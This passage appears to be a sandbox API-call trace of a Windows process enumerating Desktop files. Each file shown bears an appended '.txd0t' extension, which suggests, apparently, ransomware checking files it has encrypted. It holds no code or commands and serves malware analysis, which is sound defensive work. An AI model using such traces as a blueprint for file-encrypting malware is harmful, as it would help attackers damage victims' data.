psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0129.190] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="9JP3XV6aItTN8Fsv.gif.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\9JP3XV6aItTN8Fsv.gif.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\9JP3XV6aItTN8Fsv.gif.txd0t" [0129.190] PathFindExtensionW (pszPath="9JP3XV6aItTN8Fsv.gif.txd0t") returned=".txd0t" [0129.190] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.190] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e374e70, ftCreationTime.dwHighDateTime=0x1d5e95f, ftLastAccessTime.dwLowDateTime=0x551e57d0, ftLastAccessTime.dwHighDateTime=0x1d5e0fc, ftLastWriteTime.dwLowDateTime=0x510f63bc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xd697, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="aNP_CKGono8FHP.bmp.txd0t", cAlternateFileName="ANP_CK~1.TXD")) returned 1 [0129.190] StrCmpW (psz1="aNP_CKGono8FHP.bmp.txd0t", psz2=".") returned 1 [0129.190] StrCmpW (psz1="aNP_CKGono8FHP.bmp.txd0t", psz2="..") returned 1 [0129.191] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0129.191] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0129.191] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="aNP_CKGono8FHP.bmp.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\aNP_CKGono8FHP.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\aNP_CKGono8FHP.bmp.txd0t" [0129.191] PathFindExtensionW (pszPath="aNP_CKGono8FHP.bmp.txd0t") returned=".txd0t" [0129.191] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.191] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59d84430, ftCreationTime.dwHighDateTime=0x1d5ec72, ftLastAccessTime.dwLowDateTime=0x6b71ab60, ftLastAccessTime.dwHighDateTime=0x1d5edb6, ftLastWriteTime.dwLowDateTime=0x510f63bc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x3398, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Eiu0lN-XaE.docx.txd0t", cAlternateFileName="EIU0LN~1.TXD")) returned 1 [0129.191] StrCmpW (psz1="Eiu0lN-XaE.docx.txd0t", psz2=".") returned 1 [0129.191] StrCmpW (psz1="Eiu0lN-XaE.docx.txd0t", psz2="..") returned 1 [0129.191] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0129.191] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0129.191] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="Eiu0lN-XaE.docx.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Eiu0lN-XaE.docx.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Eiu0lN-XaE.docx.txd0t" [0129.191] PathFindExtensionW (pszPath="Eiu0lN-XaE.docx.txd0t") returned=".txd0t" [0129.191] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.191] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x210b79b0, ftCreationTime.dwHighDateTime=0x1d5e3df, ftLastAccessTime.dwLowDateTime=0xcdbaa770, ftLastAccessTime.dwHighDateTime=0x1d5e9b2, ftLastWriteTime.dwLowDateTime=0x5111c5b5, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x15427, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="I0Kapz95f.avi.txd0t", cAlternateFileName="I0KAPZ~1.TXD")) returned 1 [0129.191] StrCmpW (psz1="I0Kapz95f.avi.txd0t", psz2=".") returned 1 [0129.191] StrCmpW (psz1="I0Kapz95f.avi.txd0t", psz2="..") returned 1 [0129.191] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0129.191] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0129.191] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="I0Kapz95f.avi.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\I0Kapz95f.avi.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\I0Kapz95f.avi.txd0t" [0129.191] PathFindExtensionW (pszPath="I0Kapz95f.avi.txd0t") returned=".txd0t" [0129.191] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.191] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27f63220, ftCreationTime.dwHighDateTime=0x1d5ea5a, ftLastAccessTime.dwLowDateTime=0x961c3bd0, ftLastAccessTime.dwHighDateTime=0x1d5edf9, ftLastWriteTime.dwLowDateTime=0x5114291c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x9158, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="OCsemDUOtc.swf.txd0t", cAlternateFileName="OCSEMD~1.TXD")) returned 1 [0129.191] StrCmpW (psz1="OCsemDUOtc.swf.txd0t", psz2=".") returned 1 [0129.191] StrCmpW (psz1="OCsemDUOtc.swf.txd0t", psz2="..") returned 1 [0129.191] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0129.191] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0129.191] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="OCsemDUOtc.swf.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\OCsemDUOtc.swf.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\OCsemDUOtc.swf.txd0t" [0129.191] PathFindExtensionW (pszPath="OCsemDUOtc.swf.txd0t") returned=".txd0t" [0129.191] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.191] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8344ae60, ftCreationTime.dwHighDateTime=0x1d5e98b, ftLastAccessTime.dwLowDateTime=0x5773cb70, ftLastAccessTime.dwHighDateTime=0x1d5e84d, ftLastWriteTime.dwLowDateTime=0x5114291c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x218e, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="R1PzCjuzfThXdK9.ppt.txd0t", cAlternateFileName="R1PZCJ~1.TXD")) returned 1 [0129.191] StrCmpW (psz1="R1PzCjuzfThXdK9.ppt.txd0t", psz2=".") returned 1 [0129.191] StrCmpW (psz1="R1PzCjuzfThXdK9.ppt.txd0t", psz2="..") returned 1 [0129.191] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0129.191] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0129.191] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="R1PzCjuzfThXdK9.ppt.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\R1PzCjuzfThXdK9.ppt.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\R1PzCjuzfThXdK9.ppt.txd0t" [0129.192] PathFindExtensionW (pszPath="R1PzCjuzfThXdK9.ppt.txd0t") returned=".txd0t" [0129.192] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.192] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6dee5590, ftCreationTime.dwHighDateTime=0x1d5ea10, ftLastAccessTime.dwLowDateTime=0x50bf210, ftLastAccessTime.dwHighDateTime=0x1d5e43b, ftLastWriteTime.dwLowDateTime=0x51168ac9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x9d2d, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Rud6mibY589Ee3.mkv.txd0t", cAlternateFileName="RUD6MI~1.TXD")) returned 1 [0129.192] StrCmpW (psz1="Rud6mibY589Ee3.mkv.txd0t", psz2=".") returned 1 [0129.192] StrCmpW (psz1="Rud6mibY589Ee3.mkv.txd0t", psz2="..") returned 1 [0129.192] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0129.192] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0129.192] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="Rud6mibY589Ee3.mkv.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Rud6mibY589Ee3.mkv.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Rud6mibY589Ee3.mkv.txd0t" [0129.192] PathFindExtensionW (pszPath="Rud6mibY589Ee3.mkv.txd0t") returned=".txd0t" [0129.192] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.192] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc974c90, ftCreationTime.dwHighDateTime=0x1d5e782, ftLastAccessTime.dwLowDateTime=0xf811d50, ftLastAccessTime.dwHighDateTime=0x1d5ea54, ftLastWriteTime.dwLowDateTime=0x51168ac9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x9345, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="X24_B.gif.txd0t", cAlternateFileName="X24_BG~1.TXD")) returned 1 [0129.192] StrCmpW (psz1="X24_B.gif.txd0t", psz2=".") returned 1 [0129.192] StrCmpW (psz1="X24_B.gif.txd0t", psz2="..") returned 1 [0129.192] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0129.192] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0129.192] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="X24_B.gif.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\X24_B.gif.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\X24_B.gif.txd0t" [0129.192] PathFindExtensionW (pszPath="X24_B.gif.txd0t") returned=".txd0t" [0129.192] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.192] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7352e6f0, ftCreationTime.dwHighDateTime=0x1d5e4c9, ftLastAccessTime.dwLowDateTime=0x81b04700, ftLastAccessTime.dwHighDateTime=0x1d5e48e, ftLastWriteTime.dwLowDateTime=0x5118ee47, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xaaf1, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="xs8aVnsK9NnWwoql.png.txd0t", cAlternateFileName="XS8AVN~1.TXD")) returned 1 [0129.192] StrCmpW (psz1="xs8aVnsK9NnWwoql.png.txd0t", psz2=".") returned 1 [0129.192] StrCmpW (psz1="xs8aVnsK9NnWwoql.png.txd0t", psz2="..") returned 1 [0129.192] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0129.192] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0129.192] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="xs8aVnsK9NnWwoql.png.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\xs8aVnsK9NnWwoql.png.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\xs8aVnsK9NnWwoql.png.txd0t" [0129.192] PathFindExtensionW (pszPath="xs8aVnsK9NnWwoql.png.txd0t") returned=".txd0t" [0129.192] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.192] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcbf2e40, ftCreationTime.dwHighDateTime=0x1d5e4e8, ftLastAccessTime.dwLowDateTime=0x7729f3c0, ftLastAccessTime.dwHighDateTime=0x1d5e1a1, ftLastWriteTime.dwLowDateTime=0x5118ee47, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x5ec8, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="yGjZ.rtf.txd0t", cAlternateFileName="YGJZRT~1.TXD")) returned 1 [0129.192] StrCmpW (psz1="yGjZ.rtf.txd0t", psz2=".") returned 1 [0129.192] StrCmpW (psz1="yGjZ.rtf.txd0t", psz2="..") returned 1 [0129.192] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0129.192] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0129.192] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="yGjZ.rtf.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yGjZ.rtf.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yGjZ.rtf.txd0t" [0129.192] PathFindExtensionW (pszPath="yGjZ.rtf.txd0t") returned=".txd0t" [0129.192] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.192] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73a938d0, ftCreationTime.dwHighDateTime=0x1d5f044, ftLastAccessTime.dwLowDateTime=0xab35d760, ftLastAccessTime.dwHighDateTime=0x1d5e37c, ftLastWriteTime.dwLowDateTime=0x511b4efb, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1484c, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="yKYlr_viA.odt.txd0t", cAlternateFileName="YKYLR_~1.TXD")) returned 1 [0129.192] StrCmpW (psz1="yKYlr_viA.odt.txd0t", psz2=".") returned 1 [0129.193] StrCmpW (psz1="yKYlr_viA.odt.txd0t", psz2="..") returned 1 [0129.193] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0129.193] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0129.193] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="yKYlr_viA.odt.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yKYlr_viA.odt.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yKYlr_viA.odt.txd0t" [0129.193] PathFindExtensionW (pszPath="yKYlr_viA.odt.txd0t") returned=".txd0t" [0129.193] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.193] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73a938d0, ftCreationTime.dwHighDateTime=0x1d5f044, ftLastAccessTime.dwLowDateTime=0xab35d760, ftLastAccessTime.dwHighDateTime=0x1d5e37c, ftLastWriteTime.dwLowDateTime=0x511b4efb, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1484c, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="yKYlr_viA.odt.txd0t", cAlternateFileName="YKYLR_~1.TXD")) returned 0 [0129.193] FindClose (in: hFindFile=0xec23f0 | out: hFindFile=0xec23f0) returned 1 [0129.193] GetProcessHeap () returned 0xe30000 [0129.193] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed90d0 | out: hHeap=0xe30000) returned 1 [0129.193] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c24360, ftCreationTime.dwHighDateTime=0x1d5eda4, ftLastAccessTime.dwLowDateTime=0xd1e421a0, ftLastAccessTime.dwHighDateTime=0x1d5e5e8, ftLastWriteTime.dwLowDateTime=0x511db202, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x12d6c, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="tCY_wfmFOaMzCGVNZFEd.m4a.txd0t", cAlternateFileName="TCY_WF~1.TXD")) returned 1 [0129.193] StrCmpW (psz1="tCY_wfmFOaMzCGVNZFEd.m4a.txd0t", psz2=".") returned 1 [0129.193] StrCmpW (psz1="tCY_wfmFOaMzCGVNZFEd.m4a.txd0t", psz2="..") returned 1 [0129.193] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.193] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.193] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="tCY_wfmFOaMzCGVNZFEd.m4a.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\tCY_wfmFOaMzCGVNZFEd.m4a.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\tCY_wfmFOaMzCGVNZFEd.m4a.txd0t" [0129.193] PathFindExtensionW (pszPath="tCY_wfmFOaMzCGVNZFEd.m4a.txd0t") returned=".txd0t" [0129.193] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.193] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa00db610, ftCreationTime.dwHighDateTime=0x1d5f00a, ftLastAccessTime.dwLowDateTime=0x1f58d860, ftLastAccessTime.dwHighDateTime=0x1d5e5e7, ftLastWriteTime.dwLowDateTime=0x511db202, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xf698, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="TLtL7FqQ6HKzRKYgMVx.mp3.txd0t", cAlternateFileName="TLTL7F~1.TXD")) returned 1 [0129.193] StrCmpW (psz1="TLtL7FqQ6HKzRKYgMVx.mp3.txd0t", psz2=".") returned 1 [0129.193] StrCmpW (psz1="TLtL7FqQ6HKzRKYgMVx.mp3.txd0t", psz2="..") returned 1 [0129.193] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.193] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.193] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="TLtL7FqQ6HKzRKYgMVx.mp3.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\TLtL7FqQ6HKzRKYgMVx.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\TLtL7FqQ6HKzRKYgMVx.mp3.txd0t" [0129.193] PathFindExtensionW (pszPath="TLtL7FqQ6HKzRKYgMVx.mp3.txd0t") returned=".txd0t" [0129.193] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.193] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x506c6ac0, ftCreationTime.dwHighDateTime=0x1d5ea0b, ftLastAccessTime.dwLowDateTime=0x59cb56b0, ftLastAccessTime.dwHighDateTime=0x1d5e210, ftLastWriteTime.dwLowDateTime=0x5120bf81, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x9cac, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="tpWq0W7bdVW50sRvURB.ods.txd0t", cAlternateFileName="TPWQ0W~1.TXD")) returned 1 [0129.193] StrCmpW (psz1="tpWq0W7bdVW50sRvURB.ods.txd0t", psz2=".") returned 1 [0129.193] StrCmpW (psz1="tpWq0W7bdVW50sRvURB.ods.txd0t", psz2="..") returned 1 [0129.193] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.193] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.193] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="tpWq0W7bdVW50sRvURB.ods.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\tpWq0W7bdVW50sRvURB.ods.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\tpWq0W7bdVW50sRvURB.ods.txd0t" [0129.193] PathFindExtensionW (pszPath="tpWq0W7bdVW50sRvURB.ods.txd0t") returned=".txd0t" [0129.194] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.194] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27a643a0, ftCreationTime.dwHighDateTime=0x1d5ebea, ftLastAccessTime.dwLowDateTime=0xe444740, ftLastAccessTime.dwHighDateTime=0x1d5e514, ftLastWriteTime.dwLowDateTime=0x51227672, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x17820, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="VCbe_Sa0NEidgDcyfgFz.flv.txd0t", cAlternateFileName="VCBE_S~1.TXD")) returned 1 [0129.194] StrCmpW (psz1="VCbe_Sa0NEidgDcyfgFz.flv.txd0t", psz2=".") returned 1 [0129.194] StrCmpW (psz1="VCbe_Sa0NEidgDcyfgFz.flv.txd0t", psz2="..") returned 1 [0129.194] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.194] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.194] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="VCbe_Sa0NEidgDcyfgFz.flv.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\VCbe_Sa0NEidgDcyfgFz.flv.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\VCbe_Sa0NEidgDcyfgFz.flv.txd0t" [0129.194] PathFindExtensionW (pszPath="VCbe_Sa0NEidgDcyfgFz.flv.txd0t") returned=".txd0t" [0129.194] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.194] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c70bd0, ftCreationTime.dwHighDateTime=0x1d5ea5f, ftLastAccessTime.dwLowDateTime=0x2b6dbb40, ftLastAccessTime.dwHighDateTime=0x1d5f071, ftLastWriteTime.dwLowDateTime=0x5124d96b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x39d5, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Vn Oo.gif.txd0t", cAlternateFileName="VNOOGI~1.TXD")) returned 1 [0129.194] StrCmpW (psz1="Vn Oo.gif.txd0t", psz2=".") returned 1 [0129.194] StrCmpW (psz1="Vn Oo.gif.txd0t", psz2="..") 